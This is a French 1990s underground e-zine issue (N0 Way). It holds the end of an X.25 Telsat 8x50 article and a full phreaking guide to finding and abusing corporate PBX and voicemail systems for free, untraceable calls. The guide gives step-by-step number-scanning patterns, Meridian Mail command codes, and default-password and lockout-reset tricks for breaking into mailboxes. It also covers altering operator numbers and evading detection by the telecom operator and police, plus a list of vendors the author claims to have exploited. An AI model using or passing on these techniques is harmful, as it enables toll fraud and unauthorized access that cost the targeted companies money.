quand on se connecte sur un 8X50 par le reseau X25, on recoit generalement:
- Pour un appel normal:
COM <NUA de l'appelant>
- Pour un appel en PCV:
COM <NUA de l'appelant> R
- Pour un appel avec groupe ferme d'abonne:
COM <NUA de l'appelant> Gxx
- Pour un appel avec groupe ferme d'abonne et acceptation du PCV:
COM <NUA de l'appelant> R Gxx
>Protection par mot de passe en entrée:
======================================
Il est possible de protéger le telsat 8x50 contre des intrusions
illégales en définissant un mot de passe pour la ligne x.25. Ceci
signifie que les demandes d'appel destinées au Telsat doivent etre
dotées du mot de passe correct inséré entre les octets 5 et 8 compris
de la zone de données d'appel utilisateur de 16 octets.
Si la methode de sous adressage de données utilisateur est validée,
le mot de passe ligne figurera entre les octets 7 et 10 compris.
En general, l'utilisateur n'a aucun controle sur les octets 1 à 4.
Si le demandeur n'inclut pas le mot de passe dans la zone appropriée,
le 8x50 rejettera l'appel avec un code diagnostic égal a 133.
LIB DTE 133
>Protection par NUI en sortie:
=============================
Il est possible aussi d'associer à des NUI des NUA qui seront
automatiquement appelés si l'utilisateur entre le bon NUI.
Si le NUI n'est pas integre a la demande d'appel, le code de diagnotic
sera égal à
139 (mot de passe NUI obligatoire et requis) --> LIB DTE 139
Si le NUI est faux, le code de diagnostic est égal à
140 (mot de passe NUI invalide) --> LIB DTE 140
Mais attention, si le PAD n'a pas ete configure d'une facon correcte, le
NUI peut alors etre transmis au serveur appele. Ainsi, dans le paquet
d'appel, le serveur recupere le NUI de l'appelant.
>Parametres interressants:
=========================
Dans le parametre PAD ADDRESS, on a le numero a 9 chiffres TRANSPAC qui
correspond au NUA du PAD 8X50.
>Liste des LIBs emanant du 8x50:
===============================
DTE 00 : Le telsat a libéré l'appel
133 : fonction demandée non autorisée ou mot de passe invalide
09 : Telsat pas pràt
136 : ligne x25 inactivée
137 : Mnémonique indéfinie dans la demande de connexion d'appel
abrégé ou pour une voie fonctionnant en appel automatique.
138 : aucune voie logique disponible sur le Telsat.
139 : mot de passe/NUI requis pour la connexion.
140 : mot de passe/NUI invalide.
142 : appel TACT (test de terminal) non autorisé a partir de
cette voie.
nnn : ne provient pas du Telsat
OCC xxx : occupé
INV xxx : demande de fonction invalide
NC xxx : congestion reseau
DER xxx : derangement/hs
NA xxx : acces interdit
NP xxx : ne peut etre obtenu
RPE xxx : erreur procedure distante
ERR xxx : Erreur procedure locale
NRC xxx ou
PCV xxx : Facturation PCV refusée.
INC xxx : destination incompatible
NFS xxx : selection rapide non demandee.
PAD xxx : le module a libéré l'appel suite à une demande du distant.
Bonne chasse et bonne chance
chers
/\/etrunners
++NeurAlien
-%!% N0 Way %!%-
Volume I, Numéro 2, Partie 2.6
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%
%% Yet another phine article by EASYHACKER from FFT about %%
%% hack'n phreaking on %%
%% %%
%% PPPPPP BBBBBB XXXX XX %%
%% -----> PPPP PP BBBB BB XXXX XX <----- %%
%% -----> PPPPPP BBBBBB XXXXX <----- %%
%% -----> PPPP BBBB BB XXXX XX <----- %%
%% PPPP BBBBBBB XXXX XX %%
%% %%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
S'il s'agit d'une activite moins interessante que le hack de reseaux
en tous genres, le phreaking represente tout de meme le premier secteur
d'activite underground. Malheureusement, en France, la plupart de ceux qui se
prennent pour des gros phreakers se contentent d'acheter des la call a des
fournisseurs qui trouvent la de gros pigeons qui achetent 600 ou 700 balles
leur abo au mois. Il est pourtant beaucoup plus amusant de trouver par soi-
meme des moyens d'epargner la facture bimestrielle de France Telecons tout en
continuant a exercer son activite favorite. Rien que l'autosatisfaction
d'en trouver tout seul comme des grands vous absout du lourd peche qu'en est
son utilisation.
Quels sont les principaux moyens de phreaking dont on dispose (encore)
dans nos belles contrees ?
Les cartes ? :-)) LAME ! M0NIT0RED ! 0VER ! F0RGET THEM !
La telephonie cellulaire ? Yeah ! Mais faut investir au depart...
Les fausses telecartes ? Faut un portable, un coupleur acoustique, un
modem de poche, et l'hiver il fait froid dans les cabines, c'est un coup a
attraper la creve ! %-[]
Les outdials (sur TelNet/TymNet en particulier) ? Si votre acces depasse
pas 2400 bauds en 7 bits c'est pas le top pour leecher des warez, et en plus
c'est pas global...
La bluebox ? La quasi-totalite des commutateurs francais sont des NUMERIS
bourres de filtres... Les 2600/2400 sont systematiquement filtres depuis
quelques temps et ca m'etonnerai pas que certaines autres frequences ne soient
pas filtrees, mais enregistrees. En plus les lignes sont de pietre qualite.
Pourquoi ils se prennent la tete ces abrutis de France Telecons vu que ce
n'est meme pas eux qui se font baiser dans ce cas ?
J'en ai marre, demain je pars vivre au Rwanda...
Sortir avec une nana qui bosse au centre de facturation ? A essayer =-*
Les box de toutes les couleurs qui consistent a envoyer des frequences qui
resteront sans effet ou a sabotter les installations exterieures ? Arretez de
regarder la tele... J'ai un pote qui s'est vite fait busted pour s'etre
branche sur la ligne du voisin et qui chiale sa reum a Fleury maintenant.
Les party-lines privees qui permettent d'appeller n'importe qui pour qu'il
vienne se marrer avec nous ? Yep c'est bien sympa mais je n'en connait qu'une,
qui semble etre financee par les plus grosses compagnies de telco americaines
et europeennes, et je veux bien tailler une pipe a tous les lecteurs de N0 WAY
si c'est pas trace a mort (naaaaaaaannnnnn ! c'etait pour rire ! au secours !)
Implorer Saint Zlika pour qu'un miracle se produise et que les telco
perdent votre dossier ? Arretez le ketchup avec le yaourt %*\
Bien que je ne doute pas un instant que la plupart de ces techniques
puissent encore etre utilisees en France, il y a pourtant une autre chose de
bien plus pratique et tout aussi efficace, bien que la documentation a ce
sujet se soit fait tres discrete, j'ai nomme les PBX (ou PABX pour les chieurs
(ou AUT0C0MMUTATEURS dans la langue de moliere et celle de ma copine)).
Remarquez que pour une fois le terme francais n'est pas si bete puisque plus
court que la signification anglaise de P(A)BX qui est PRIVATE (AUT0MATIC)
BRANCH (E)XCHANGE(R). Les lois de l'ethymologies etant inebranlables, un
autocommutateur sert a effectuer automatiquement les commutations. En clair,
un PBX est un(e) standard(iste) automatique qui vous aiguille sur le poste
desire apres avoir compose le numero d'une boite. Les PBX sont souvent couples
a des VMB (messageries vocales). Un tel couple remplace aisement quelques
standardiste et vous permet, Messieurs les Directeurs d'entreprise,
d'optimiser le rendement de vos employes grace a une solution telephonique
d'avant-garde. Bon treve de plaisanterie, une PBX peut assumer de nombreuses
fonctions; lorsqu'on telephone au standard et que la standardiste prefere
vous confier a une machine plutot que de supporter votre mauvaise haleine,
vous etes generalement confrontes a un repondeur vous invitant a deposer un
message. La a premiere vue c'est un repondeur classique qui vous raccroche
au nez avant que vous n'ayez eu le temps de realiser que l'enregistrement
etait commence. Fou de rage, vous recherchez dans vos Post-It (tm) le
numero de la ligne directe du poste a joindre. Si celui que vous cherchez
a joindre est effectivement la et qu'il a la bonne idee de decrocher le
telephone, vous pourrez lui dire de se procurer N0 WAY au plus vite et de
passer sur mon BBS au lieu de faire semblant de bosser. S'il ne se decide
pas a repondre, au bout d'un certain nombre de sonneries, le PBX se reveille
et fait office de repondeur vocal pour le poste concerne. Il est quelquefois
possible d'envoyer ou de recevoir des faxs de la meme facon.
Les employes de la boite peuvent, quant a eux, consulter a tout moment
leurs messages a partir de leur poste de travail ou depuis chez eux lorsqu'une
vmb est couplee au PBX (75% des cas... La reciproque n'est pas valable). Et
comme toute bonne messagerie est en droit de le faire, il est possible
d'envoyer et de transferer des messages a n'importe quel autre proprietaire
d'un compte sur ladite VMB.
Un PBX se vend en fait sous la forme d'une configuration prete a
l'emploi comprenant un PC (souvent 386sx25), un ou plusieurs disques durs de
grande capacite associes a un streamer ou des cartouches, et d'un genre de
modem tres special assurant la commutation automatique sur une ou plusieurs
lignes Numeris, ou des reseaux EtherNet ou TCP/IP. Les messages par defaut
sont souvent stoques sur CD-R0M. Les softs sont tout cools, sous Windows, et
permettent de creer tres facilement l'arborescence de la VMB/PBX a la maniere
d'un soft de BBS. Ils peuvent neanmoins se presenter comme un gros standard
comme c'est le cas des PBX meridian dont nous parlerons plus bas. Ces derniers
ont un avantage certain sur les autres: ils sont beaucoup moins parametrables
donc beaucoup plus faciles a hacker (toujours les memes commandes ;-) )
C'est beau la technique... Mais en quoi ca peut nous etre utile de
telephoner a une boite dont on a rien a foutre ? Tres simple: lors de la
commutation automatique, le PBX utilise le reseau telephonique interne de
l'entreprise, compose le numero de poste a obtenir exactement comme si c'etait
fait a la main de n'importe quel poste dans la boite, et des que l'appel
aboutit, tout ce qui se passe sur cette ligne est retransmi sur la votre.
Le resultat est donc le meme que si vous aviez compose le numero du
poste a partir d'un autre poste de la boite. 0r, la moindre des gentillesses
d'un bon patron est de permettre a ses employes d'appeller un numero exterieur
a partir de son poste... Generalement en faisant un indicatif sur un chiffre
puis le numero en question. Si cet indicatif n'est pas filtre par le PBX, vous
pouvez donc appeller n'importe quel numero pour le prix d'une communication a
l'entreprise (ou gratos si c'est un numero vert...). Si le PBX est en France,
la qualite de la ligne sera tout bonnement excellente et si la ligne n'est pas
en acces restreint, vous pourrez composer n'importe quoi comme si vous le
faisiez directement de chez vous (y compris les 36xx et les mobiles qui ne
peuvent pas etre appelles de l'etranger). C'est pas le T0P ca ? Toutefois ne
soyez pas stupides au point d'appeller le 3644 ou d'autres numeros robots qui
peuvent bloquer le PBX (d'ou verification technique et hop grille...) .
En fait, il y a deux facons d'utiliser un PBX: soit comme un moyen de
telephoner a perpette a moindre frais, auquel cas il grillera au bout de
quelques mois, voire quelques semaines comme il se doit, soit comme un moyen
de ne pas se faire tracer. Ainsi, le bon plan est de scanner des numeros
susceptibles d'etre traces, ou bien de faire de la call ou de la pastel en
appelant par un PBX. Interet: le PBX peut durer TRES longtemps (si vous ne
composez que des numeros verts il n'y aura aucune consequences sur la facture
de la boite et donc aucun controle technique) et vous pouvez passer vos
journees en call sans etre trace. Evidemment si vous possedez vous-meme une
ligne numeris et une sous-adresse, courrez demander la non-identification
d'appel avant de caller un PBX par cette ligne !
Evitez de changer des codes ou d'envoyer des messages dans la VMB si
vous comptez profiter du PBX, vous eviterez d'en ecourter betement la duree
de vie. Amusez-vous a ca sur des messageries qui ne possedent pas de fonction
PBX interessante.
(I) -=)> Comment trouver un PBX ? <(=-
--------------------------------------
En ce qui concerne celles en 05, il n'y a pas vraiment de regle pour
tomber sur des numeros existants. Essayez tout de meme les numeros de la forme
05 wx yz yz, 05 xy 05 xy, 05 xy zx yz et 05 xy zz zz. N'oubliez pas qu'un PBX
peut ne pas etre en service pendant les heures de boulot. Le meilleur moment
pour scanner du PBX est donc la nuit, ce qui reduit de plus le nombre de
chances de tomber sur une gentille standardiste, bien que certaines aient une
tres jolies voix. Pour distinguer une VMB/PBX d'u simple repondeur, il suffit
de s'exciter sur toutes les touches du telephone et de voir si il se passe
quelque chose ou pas (en dehors des touches du telephone qui fument).
Les PBX en RTC sont beaucoup plus nombreuses que les phree, et peut-
etre plus facile a trouver (disons que la chance intervient moins). La
demarche a suivre est la suivante:
1) Chercher sur le 11 les numeros du siege d'une boite (ce n'est pas
toujours necessaire de s'en tenir aux grosses multinationales, des petites
boites possedent aussi des PBX). Dans le cas ou vous trouvez une tripotee de
numeros, retenez surtout ceux des lignes Numeris (c'est generalement inscrit
RNIS [Numeris] sous le numero).
2) Prenez les numeros trouves un par un. Ils sont de la forme:
(z)ab pq cd ef
Telephonez alors a ce numero en dehors des heures d'ouvertures. 3 pos-
sibilites s'offrent alors:
- "Allo ?" : Tout n'est pas perdu, il est possible qu'un PBX
se cache sur une autre ligne.
- "Putain y en a marre a la fin !" : Tout est perdu, le PBX est
grille.
- "Biiiiiiiiiip...Biiiiiiiiiiip..." : Le nombre de sonneries
avant qu'un PBX decroche est parametrage. Generalement, ca decroche
immediatement sur l'acces principal, et apres 5 sonneries lorsqu'on passe par
la ligne directe d'un poste. Donc si ca decroche pas au bout de 7 sonneries,
lachez l'affaire.
- "Bienvenue sur la messagerie trouduchnok" : Yeah ! See above.
- "Booooooooooooooooooooooooooooooooooooooo" : Tonalite grave,
qui dure plusieurs secondes : acces direct a un brasseur ou au PBX. Alors la
aucun message pour vous guider au debut. Dans le meilleur des cas, vous aurez
juste a composer directement l'indicatif et le numero a obtenir pour atteindre
votre but. Sinon en tapant un peu n'importe quoi vous pouvez tomber sur
d'autres choses: fax, "le numero que vous avez demande n'est plus attribue"
(attention ce n'est pas toujours celui de France Telecom, mais simplement un
message integre au PBX qui signale que le numero de poste que vous demandez
n'existe pas !), "il est impossible d'obtenir le numero compose a partir de ce
service" (mauvais signe), "suite a des difficultes techniques, votre appel ne
peut etre achemine a ce moment-ci" (encore plus mauvais signe), "le poste XXXX
ne peut vous repondre pour le moment" (B0N SIGNE: notez le numero du poste en
question: il s'agit du numero du poste par defaut [standard] invoque lorsqu'on
demande de l'aide. Rappellez en demandant ce poste, vous pouvez tomber sur la
tonalite tant attendue), "messagerie trouduc", etc... Lorsque vous avez une
VMB a priori sans interet, passez-y tout de meme un peu de temps: la plupart
renvoient des messages d'erreurs bidons pour vous decourager alors qu'elles
sont tout a fait hackables.
- "Bip bip bip bip bip" : Si vous ne savez pas ce qu'est une
tonalite d'occupation, retournez vivre dans votre grotte.
0n peut aussi tomber sur des trucs tres curieux comme des reroutages
automatiques qui balancent des tonalites pour le moins etonnantes.
3) Pas de chance, ca ne marche pas sur ce numero ? N000000000000N ! Ne le
jetez pas ! Essayez maintenant les numeros suivants:
(z) ab pq cd cd
et
(z) ab pq cd 00
Dans beaucoup de cas, vous tomberez sur un Fax ou du vocal. Dans ce cas
il n'y a plus grand chose a faire de ce numero, essayez les autres.
Si vous tombez sur une tonalite chelou, une VMB ou n'importe quoi qui
ne semble toutefois pas etre un PBX, essayez les numeros suivants:
[(z) ab pq cd 01, 02 etc... et (z) ab pq cd c(d+1)...]
4) Toujours rien ? S'il s'agit d'une petite boite, mieux vaut abandonner
les recherches. Sinon, il va falloir scanner toute l'area.
En effet, lorsqu'une entreprise demande une installation telephonique
consequente aux telco, les numeros attribues sont T0UJ0URS de la forme:
(z) ab pq [NUM] [ER0 D] [E P0] [STE]
*T0US* les numeros demandes en meme temps ont donc le meme (z)abpq. Les
numeros de standard, fax et pbx etant faits pour etre retenus aisement, je ne
saurais que trop vous conseiller de scanner tout ce qui ressemble a:
(z) ab pq xy xy et (z) ab pq xy 00
ou 10<= xy <=99
Si vous trouvez quelque chose d'interessant, reportez-vous au 3), sinon
lachez l'affaire et essayez les autres numeros.
Petite precision: lorsque vous trouvez une VMB simple ou bien un PBX
qui est remplace par un operateur en 05, recherchez le numero RTC de la boite
sur le 11: vu le prix que coute un PBX, ils ne le mettent pas a la poubelle du
jour au lendemain au profit d'une petasse.
(II) -=)> Principaux types de PBX <(=-
--------------------------------------
Vous avez enfin trouve quelque chose d'interessant ? Bravo ! Mais ce
n'est pas fini... Voici une liste des marques proposant des VMB/PBX en France:
ACSYS VMB PBX B0ITIER - *
ALCATEL VMB PBX B.ou PC X25 ENET TCP/IP - *
ASSMANN VMB PBX PC
AURAL0G VMB PBX PC
AXELC0M VMB PC -
AT&T VMB*ou*PBX B.ou PC
BULL VMB B.ou PC X25
CSEE VMB*ou*PBX PC
DATAP0INT PBX B0ITIER
DIGILINE VMB B0ITIER X25 ENET
DIN0VA VMB PBX B.ou PC X25 ENET +
DISC0F0NE VMB PBX PC - *
ELAN INF0RMATIQUE VMB PC -
ELVETEL VMB PC -
ERC0M VMB PC
EUR0V0X VMB PC
FERMA VMB PBX B0ITIER X25 ENET +
GS4 VMB B.ou PC
IBM VMB PBX B0ITIER +
INTERV0ICE VMB PBX PC +
JS TELEC0M PBX B0ITIER
MATRA PBX B0ITIER *
MG2 TECHN0L0GIES VMB PC X25 ENET
MULTIMEDIA VMB PBX PC -
N-S0FT VMB PBX PC X25
NT MERIDIAN VMB PBX B0ITIER *
0CTEL VMB B0ITIER +
PH0NETIC VMB PBX PC X25
RACAL SYSTEMS VMB B0ITIER
SAT PBX B0ITIER
SIEMENS PBX B0ITIER
SLITEC VMB PC -
S0C0TEL PBX B0ITIER
S0PRA VMB PC
TELSIS VMB B0ITIER ENET +
TG TELEC0M PBX B0ITIER
V0CALC0M VMB B0ITIER X25 ENET
V0CATEX VMB PC
V0X VMB PC
VMX VMB B0ITIER
X-C0M VMB PC X25 TCP/IP +
Comme vous pouvez le voir, un PBX est capable de commuter des liaisons
specialisees ou les branches d'un reseau EtherNet ou X25. Ceci fait partie du
roles des bons PBX mais ne concerne pas le sujet de cet article. Par
consequent, la mention PBX mentionnee dans le tableau ci-dessus designe
uniquement l'aptitude a pouvoir appeller automatiquement un poste en RTC a
partir de l'exterieur.
Les signes (-) marquent les VMB/PBX les plus repandues dans les petites
et moyennes entreprises, les signes (+) etant reserves aux PBX haut-de-gamme
qui equipent les grosses entreprises. Les (*) designent quant a eux les PBX
dont j'ai profite jusqu'a present pour appeller l'exterieur, autrement dit
les "valeurs sures" !
Les VMB/PBX les plus repandues dans le monde sont incontestablement les
Meridian Mail de Northern Telecom. Elles ont de plus l'avantage d'etre faciles
a hacker ;-)
Etudions donc tout particulierement ce type de VMB/PBX.
(III) -=)> NT Meridian Mail <(=-
--------------------------------
0n les reconnait tres aisement a la voix de la nana qui prononce les
messages enregistres et aux messages qui, en dehors du message d'accueil,
sont toujours les memes. N'etant pas une solution sur PC et etant cense etre
pret a l'utilisation en quelques dizaines de minutes, les VMB meridian
offrent toutes les memes commandes et l'arborescence differe tres peu de l'une
a l'autre.
L'arbo classique est la suivante: lorsque vous appellez, vous etes
confrontes a un repondeur des plus classiques, vous laissez votre message et
vous vous cassez. Si vous etes un peu curieux, vous tripotez les touches *,0
et # jusqu'a tomber sur le message jouissif:
"Vous avez obtenu un service automatise qui vous mettra en relation avec
le numero compose. Veuillez entrer le nom ou le numero de la personne desiree
suivit de la touche #"
En France, et pour rester compatible avec ce que nous avons evoques
plus haut (ligne directe=(z)abpq+numero de poste), les numeros de postes (qui
sont aussi les numeros des bals sur la VMB) sont sur 4 chiffres. En regle
generale, entre 0 et 9 se trouvent des trucs particuliers comme le standard,
le fax ou l'acces aux reseaux internes. Le 0 est toujours le standard, ou
plus exactement le numero d'aide (car il est possible de le changer comme
nous le verrons plus tard). Donc bref quand on a ce message, il suffit de
composer le numero du poste puis # et hoplaboum ca dit allo dans l'poste.
Si vous preferez une version americaine du "allo", trois cas pos-
sibles:
1) Il suffit de faire un indicatif sur un chiffre pour avoir
l'exterieur. Cet indicatif est souvent 0,1 ou 9. Suit alors le numero de
telephone puis la touche #. Si vous avez le message "Il est impossible
d'obtenir ce numero a partir de ce service" c'est pas le bon indicatif, mais
ca ne signifie pas pour autant que le PBX est grille. Attention, certaines
lignes peuvent etre en acces restreint (interdiction du 19 et du 36).
Tiens j'en profite pour ajouter une petite precision importante. Il est
possible d'appeller quelqu'un a partir de son nom en faisant 11 puis son nom
converti en chiffres (ca se trouve encore sur les telephones ca ?), puis le #.
Kewl sauf que si l'indicatif d'outdial est le 1, lorsque vous voulez
appeller la province ou l'etranger, ca donne 119 ou 116 et cet abruti de PBX
croit que vous voulez appeller quelqu'un par son nom. Les PBX qui choisissent
mal leur indicatif sont donc assez limitees, mais ca depanne pour Transpac.
2) L'acces a l'exterieur n'est possible qu'en appellant une
ligne de transit, representee par un numero de poste classique. En clair, il
faut alors composer un numero de poste sur 4 chiffres, #, et si on tombe sur
une tonalite, on peut enfin tester indicatif d'outdial+numero (plus besoin de
faire #, tout ce que vous composez est envoye en direct sur la ligne de
transit). Ces lignes de transit sont souvent utilisees pour la telesur-
veillance informatique (n'esperez pas en trouver le numero sur le 11).
3) Vous n'avez pas trouve la fonction permettant d'appeller
automatiquement ce que vous voulez. Tout n'est pas perdu, mais il va falloir
faire un petit tour par la messagerie vocale.
(IV) -=)> La VMB meridian <(=-
------------------------------
* Acces direct a la VMB (par le numero du standard)
Les commandes sont soit sur une digit pour selectionner quelque chose
dans le menu en cours, soit sur 2 pour acceder directement a une commande
quelconque.
Pendant le message d'accueil, il suffit de taper 81 pour acceder a une
BAL. Au risque de me repeter, les bals sont sur 4 digits. Par defaut, le code
est bien entendu le numero des BALs. Le plus dur au debut est de tomber sur
un numero de BAL existante. Scannez d'abord les bals de la forme x100, puis
augmentez de 5 en 5 (x105 x110 x115 etc...). Une fois que vous etes logges,
vous arrivez a la lecture du courrier. Les commandes possibles sont:
2: lecture du message en cours
4: message precedent
5: ecrire un message
6: messave suivant
9: appelle le poste de l'expediteur
Les autres commandes possibles sont:
70: ajout de la mention "URGENT" sur un message
71: repond au message en cours
72: consulter l'envellope du message
73: transfert
74: ???
76: efface le message
77: supprime le message de tous les destinataires
78: envoi de message dans toutes les bals
79: envoi un message apres son enregistrement
Et les commandes se rapportant plus a votre boite qu'aux messages:
80: parametrage VMB
81: reconnexion
82: repondeurs (interne et externe)
83: deconnexion
84: change le mot de passe
85: listes de diffusion
86: acces direct a un message (faire numero du msg + #)
87: annuaire des bals
88: maintenance des bals
89: changement du nom du proprio
Certaines commandes etant particulierement interessantes, je vais en
detailler quelques unes:
80: permet d'acceder a un menu tres interessant concernant le
parametrage global de la VMB. Les differents choix proposes sont:
1: change le numero de l'operateur (lorsqu'on demande de l'aide en tapant
0 ou qu'on se fait jeter apres 3 essais de hack d'une bal). Les digits
filtrees sont les memes que lorsqu'on est directos sur le PBX, par consequent
les indicatifs qui ne marchaient pas n'ont pas plus de chances de marcher en
passant par la. Par contre lorsque la fonction d'appel automatique d'un poste
est absente, celle-ci vient a la rescousse. Le numero doit la aussi etre
suivi de # et precede de l'indicatif d'outdial. REMETTEZ IMPERATIVEMENT LE
NUMER0 DE P0STE PRECEDENT (ca le dit lorsque vous essayez de le modifier)
sinan le lendemain matin c'est D0WN !!! :*(
2: modification du message d'accueil (5 pour enregistrer, # pour finir)
3: modification de l'arborescence. J'avoue ne pas avoir capte grand chose
a cette fonction (qui m'a pourtant l'air tres interessante), car elle fait
references a plein de nombres dont la signification est difficile a trouver
sans la doc. Mais j'ai beau avoir pratiquement tout explore, je n'ai pas
trouve quoi que ce soit permettant de modifier les indicatifs filtres :-(
81: cette fonction est un bonheur pour pouvoir scanner des
codes sans se faire deco. 0n est en effet deco au bout de 3 essais, mais le
compteur est remis a zero lorsqu'on se logge. Par consequent, il suffit de
faire deux essais, de se logger sous une bal dont on connait le code, de
refaire 81 et hop... le compteur est remis a zero et on peut refaire 2 essais
avant de se relogger etc... 0n peut ainsi scanner autant de BAL que desire
sans jamais se faire deconnecter. ;-)
83: a quoi sert cette fonction ?
85: les listes de diffusions sont tres pratiques pour pouvoir
scanner les numeros de bals utilises. Il suffit en effet d'entrer le numero
de la liste a creer suivi de #, de faire 5 et hop, la VMB attend les numeros
de BALs et vous dit au fur et a mesure si c'est attribue ou non. Attention
toutefois: les frequences DTMF ne sont pas pris en compte lorsque le message
dit "Il n'y a pas de boite au numero". La signalisation ne reprend qu'apres
cette phrase, avant de prononcer le numero de la BAL en question. Donc ne
vous precipitez pas sinon ca va systematiquement vous dire que la BAL entree
n'existe pas a cause d'une erreur de frappe...
Le plus simple pour hacker des BALs est donc de scanner toutes les
BALs existantes grace a cette fonction, de tout noter au fur et a mesure,
puis de tester celles dont le passe est egal au poste grace a la commande 81.
87: cette fonction est parfois accessible de tous, mais
generalement reservee a quelques BALs de niveau de securite superieur. C'est
assez lourd car ca vous donne pour chaque numero le nom du proprietaire, la
date de la derniere visite, le nombre de messages envoyes, recus, archives et
d'autres conneries, mais c'est quand meme une aubaine lorsque cette option est
disponible !
88: cette fonction n'est accessible que par la BAL du service
informatique (souvent situe dans les 9000 et ne correspondant pas forcement a
un poste en service). Les choix proposes sont les suivants:
1: Informations sur une boite: derniere visite, nom du proprio, etc...
2: Suppression d'une boite: attention: le numero doit etre valide par deux
appuis successifs sur la touche #.
3: Reinitialisation d'une boite: cette commande peut s'effectuer sur une
BAL en service ou non. Les messages et repondeurs sont effaces, et le code est
remis au numero de la BAL.
Il n'est malheureusement impossible de modifier le niveau d'une autre
BAL ni le filtre des indicatifs a ce point-ci.
89: commande souvent retiree pour des raisons que je n'explique
pas encore...
* Acces via repondeur personnel
Comme j'ai deja du l'expliquer plus haut, lorsqu'on appelle un poste
par sa ligne directe (le poste etant equivalent au numero des BALs) et que le
correspondant ne repond pas, la VMB se reveille et vous propose de deposer un
message. L'acces a la VMB et surtout au PBX reste toutefois possible comme
pour le standard: il suffit de faire par exemple 0* pendant la lecture du
message pour acceder a l'autocommutage.
Interet de passer par la ligne directe d'un poste plutot que par le
standard: si vous trouvez le poste de quelqu'un de vacant ou d'absent, vous
pouvez utiliser la PBX meme si il y a une operatrice au standard. Ainsi
certains PBX ne sont accessible en 05 que la nuit, mais il est possible de
s'en servir en journee par ce moyen. Si il y a un operateur au standard 24h/24
et aucun poste vacant 24h/24, il suffit de trouver un poste utilise la nuit et
un pour le jour...
C'est pourquoi, au risque de me repeter, lorsqu'un PBX grille en 05, il
faut imperativement tester les lignes directes, meme si ca revient un peu plus
cher, ca depanne bien !!!
(V) -=)> Les autres VMB/PBX <(=-
--------------------------------
La procedure a suivre pour pouvoir dialer sur d'autres types de PBX est
tres variable. Ca peut etre le fait d'ecrire dans la bal [indicatif]+numero,
ou bien de taper deux fois l'indicatif puis le numero suivi de # apres avoir
entre son numero de BAL. Ca peut etre beaucoup plus complexe suivant l'arbo
mise en place.
Le seul moyen de distinguer les differentes marques de PBX est a la
voix des messages pre-enregistres. Par exemple les VMB dont j'ignore la marque
mais ou une belle voix de metisse vous guide n'ont aucune fonction de PBX a
ma connaissance.
Certaines VMB (Alcatel, Ferma, GS4, Intervoice) permettent aussi de se
faire des teleconferences en direct entre plusieurs BALs. Ca permet de se
taper des gros delires a 20 connectes simultanes. Lorsque ces VMB sont en
numero vert international c'est vraiment le T0P, d'autant plus que certaines
(Ex:Etherix) proposent une commande INV0KE qui permet d'appeller n'importe qui
a se joindre a vous.
(VI) -=)> Conseils d'utilisation <(=-
-------------------------------------
FAQ: "les PBX c'est kewl mais... ca craint ?"
Les avis sont mitiges: pour certains, c'est 100% sans risque car les
PBX permettant d'appeller l'exterieur ne sont pas reconnues par France Telecon
et en cas de litige, c'est pour la pomme de la boite et France Telecom ne peut
pas donner, meme aux keufs, d'infos concernant les numeros ayant appelle les
lignes concernees. Pour d'autres c'est pipobingo, du moment que la boite porte
plainte aux keufs, tous les moyens leurs sont accessibles.
J'ai bien quelques potes qui se sont fait busted pour phreaking mais
mais dans la mesure ou ils faisaient aussi bien de la PBX que de la call ou de
la box, il est difficile de savoir ce qui les a grilles exactement, bien que
les keufs n'oublierent pas de considerer les PBX dans leurs rapports.
FAQ: "vaut-il mieux les utiliser le jour ou la nuit ?"
La aussi, les opinions divergent: caller le jour permet d'etre moins
suspect sur la liste des appels, caller la nuit permet d'eviter de se faire
griller en direct.
Pour ma part je raisonne de la facon suivante: si il y a des employes
(autre qu'agents de securite) la nuit, mieux vaut caller la nuit: ils pourront
etre accuses, et les types qui bossent la nuit ne sont pas des ingenieurs
informatique qui sont payes suffisemment gracement pour ne pas avoir a passer
de nuits blanches. Dans le cas contraire, j'utilise le PBX uniquement en
journee. Si la boite a la meme activite jour et nuit, bien evidemment, votre
periode d'appel n'aura aucune consequence.
FAQ: "solidite et duree de vie ?"
Un PBX de grosse boite est tres solide, on peut etre a 10 en meme temps
dessus sans que ca ne limite la duree de vie (essayez avec une carte vous m'en
direz des nouvelles). Maintenant il faut savoir que pour une petite boite, si
les 1000 F de facture journaliere sont depasses, le centre de prevention de FT
se bouge le cul et previent aussitot la boite (j'ai ete temoin d'une lettre a
ce sujet dans la boite ou je bossais cet ete). Pour une grosse multinationale
il faut deja etre un peu plus gourmand.
La duree de vie est difficile a determiner, ca peut flamber en une
semaine comme en un an ! Un PBX peut de plus s'arreter quelque temps puis
reprendre tout a coup. 0u bien passer du simple indicatif sur une digit en
guise d'outdial au coup du numero de la ligne de transit. 0u bien simplement
virer l'acces 05 en gardant le PBX sur les lignes RTC.
(VII) -=)> Keep on phreaking ! <(=-
-----------------------------------
Voila j'espere vous avoir un peu eclaire au sujet de ce fabuleux moyen
de phreaking que sont les PBX. Si cela vous permet de trouver des PBX vierges,
vous avez gagne le droit de m'en donner les numeros ;-)
Quelques greetings... New Id, Evian, EFZ Team, Pak, Disease Factory,
Seven Up, Andreas, Voyager, Phantor, FCS, Hackick, Hackline, Joshua, KewlHP,
HPReg, Zarkdav, NewTrend, Doctor Byte, ClockWork 0range, Sledge, SkinHead,
Real Sniper, Speedy Gonzales, Anixter, Geat, Fortan, Spy Hunter, et a vous
pour avoir lu cet article jusqu'au bout (quel courage...) .
Vous pouvez me contacter sur:
EFZ: 3614/3615 AS-K-AR-0U-ND bal EasyHacker
The 0NE BBS: +33-149-887-691 bal EasyHacker
RTC-0NE: +33-148-701-029 bal EasyHacker
Stampede: +1-813-754-0685 bal EasyDialer
The Line aka QSD bal EasyDialer
Y0H!BBS: +49-L0-0K-F0-R-IT bal EasyHacker
Sectel: +49-N0-T-F0-R-Y0-U bal EasyHacker
[NeurAlien: SecTec pas SecTel !!!!]
TTGIPTS: +1-303-427-0621 bal EasyDialer
HideWay: +1-WH-AT-IS-IT aka Rachid Benzaoui
FidoNet: 2:242/260.21
RTEL: :-)) pas RTEL ! :-?
Your,
EasyHacker / F.F.T for N0 WAY issue 2
[Federation of Free Traders
aka Fuck France Telecom !!!]
-%!% N0 Way %!%-
Volume I, Numéro 2, Partie 2.7
Cet article est un article de CORE-DUMP, journal Underground Hacker jamais
diffuse publiquement. (regardez la date!!!!)
